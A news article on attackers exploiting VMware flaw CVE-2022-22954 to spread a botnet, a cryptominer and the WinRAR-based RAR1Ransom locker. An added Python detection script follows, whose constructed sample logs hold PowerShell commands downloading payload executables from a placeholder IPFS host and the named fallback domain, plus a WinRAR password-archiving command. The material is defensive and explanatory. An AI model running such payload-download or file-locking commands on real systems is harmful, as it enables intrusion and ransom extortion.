Threat actors have exploited a VMware vulnerability

November 3, 2022
Threat actors exploited a critical vulnerability in VMware Workspace ONE Access to deliver malware such as the RAR1Ransom tool, a kit that locks victims' files inside password-protected archives.

According to reports, the current incident is enabled by the flaw tracked as CVE-2022-22954, a remote code execution bug triggered through server-side template injection. Researchers state that the threat actors used it to deploy the Mirai botnet for launching distributed denial-of-service attacks, the RAR1Ransom tool, and the GuardMiner cryptominer.

Fortunately, VMware released security updates as soon as the vulnerability was identified a few months ago. However, the product attracted many threat groups after the researchers who discovered the flaw published a proof of concept.


Other threat actors have also abused the VMware vulnerability.


Last May, a report from a separate researcher warned organisations that the VMware vulnerability was being targeted by the EnemyBot operators. In August, however, researchers observed a shift in the attacks: the actors were using the bug to deliver miners, lockers, and DDoS tools alongside data exfiltration.

Additionally, there are cases in which the threat actors used a pair of scripts, one PowerShell and one Bash, to target Windows and Linux hosts respectively. The scripts retrieved a list of files to deploy on the infected devices.

The PowerShell script downloads several files from a Cloudflare IPFS gateway, such as the config[.]json, networkmanager[.]exe, phpupdate[.]exe, clean[.]bat, phpguard[.]exe, and encrypt[.]exe.

The researchers claimed that each of the files listed above performs a distinct task, such as data encryption or cryptocurrency mining. If the Cloudflare resource is unavailable, the malware falls back to a backup link on the crustwebsites[.]net domain.

RAR1Ransom is a simple ransomware kit that abuses WinRAR to compress targeted files and lock them with a password. As is typical for ransomware payloads, the tool only targets specific file types, and it appends the rar1 extension to the resulting archives.

Finally, the threat actors drop ransom notes demanding a payment of 2 XMR to a given wallet address. Today, 2 XMR costs nearly $150. Even though the kit implements no encryption routine of its own, the files remain inaccessible without a valid archive password.
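The two behaviours described above, the script that fetches its payload files from an IPFS gateway with a fallback domain and the WinRAR-based locker that writes password-protected .rar1 archives, both leave traces in process-creation telemetry. The following is an added example, not code from the original article or from any of the researchers it cites, of a small defender-side scan over such telemetry. The log lines are constructed for the example (the gateway host ipfs-gateway.example and the CID QmPLACEHOLDER are placeholders, not real indicators); the filenames, the crustwebsites[.]net fallback domain and the rar1 extension come from the article, and the -p / -hp switches are WinRAR's documented password switches. The field layout timestamp|host|image|command line is an assumption about the log source.

```python
import re
from collections import defaultdict

# Constructed sample process-creation telemetry (NOT real logs).
# Field layout is an assumption: timestamp|host|image|command line
SAMPLE_LOG = r"""
2022-10-20T10:01:02Z|host-a|powershell.exe|powershell -nop -c "Invoke-WebRequest https://ipfs-gateway.example/ipfs/QmPLACEHOLDER/phpupdate.exe -OutFile C:\Users\Public\phpupdate.exe"
2022-10-20T10:01:05Z|host-a|powershell.exe|powershell -c "Invoke-WebRequest http://crustwebsites.net/encrypt.exe -OutFile C:\Users\Public\encrypt.exe"
2022-10-20T10:03:11Z|host-a|WinRAR.exe|"C:\Program Files\WinRAR\WinRAR.exe" a -hpEXAMPLEPASS C:\Users\Public\Documents\report.docx.rar1 C:\Users\Public\Documents\report.docx
2022-10-20T11:00:00Z|host-b|WinRAR.exe|"C:\Program Files\WinRAR\WinRAR.exe" a backup.rar C:\Users\bob\Documents
2022-10-20T11:05:00Z|host-c|powershell.exe|powershell -c "Get-Process"
"""

# Payload filenames named in the article (defanged there as name[.]ext).
DROPPED_NAMES = {"config.json", "networkmanager.exe", "phpupdate.exe",
                 "clean.bat", "phpguard.exe", "encrypt.exe"}
BACKUP_DOMAIN = "crustwebsites.net"   # fallback domain named in the article

URL_RE = re.compile(r'https?://[^\s"]+')
DOWNLOAD_RE = re.compile(r"Invoke-WebRequest|iwr|DownloadFile|curl|wget", re.IGNORECASE)
# WinRAR password switches: -p<pw> (data only) or -hp<pw> (headers + data)
RAR_PASSWORD_SWITCH_RE = re.compile(r"(?:^|\s)-h?p\S*", re.IGNORECASE)
RAR1_EXT_RE = re.compile(r"\.rar1\b", re.IGNORECASE)
ARCHIVER_IMAGES = {"winrar.exe", "rar.exe"}


def parse_line(line):
    """Split one telemetry line into (timestamp, host, image, command line)."""
    ts, host, image, cmdline = line.split("|", 3)
    return ts, host, image, cmdline


def analyze(image, cmdline):
    """Return the set of finding labels that one process event triggers."""
    findings = set()
    if DOWNLOAD_RE.search(cmdline):
        for url in URL_RE.findall(cmdline):
            low = url.lower()
            if "/ipfs/" in low:                       # IPFS gateway path convention
                findings.add("ipfs_gateway_download")
            if BACKUP_DOMAIN in low:
                findings.add("backup_domain_download")
            if low.rsplit("/", 1)[-1] in DROPPED_NAMES:
                findings.add("known_dropped_filename")
    if image.lower() in ARCHIVER_IMAGES:
        if RAR_PASSWORD_SWITCH_RE.search(cmdline):    # archive created with a password
            findings.add("rar_password_archive")
        if RAR1_EXT_RE.search(cmdline):               # output named *.rar1
            findings.add("rar1_extension")
    return findings


def scan(log_text):
    """Aggregate findings per host across all lines of the log."""
    per_host = defaultdict(set)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, host, image, cmdline = parse_line(line)
        per_host[host] |= analyze(image, cmdline)
    return dict(per_host)


def suspicious_hosts(log_text, threshold=2):
    """Hosts showing at least `threshold` distinct findings; a single
    password-protected archive alone is normal admin activity."""
    return sorted(h for h, f in scan(log_text).items() if len(f) >= threshold)


if __name__ == "__main__":
    for host, findings in scan(SAMPLE_LOG).items():
        print(host, sorted(findings))
    print("suspicious:", suspicious_hosts(SAMPLE_LOG))
```

The per-host threshold is the point of the design: a lone password-protected RAR archive (host-b) is ordinary backup behaviour and is not alerted on, whereas a host that downloads a known payload name from an IPFS gateway or the fallback domain and then runs WinRAR with a password writing .rar1 files (host-a) crosses the threshold. In a real deployment the constructed SAMPLE_LOG would be replaced by Sysmon event 1 or EDR process-creation records in the same four fields.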
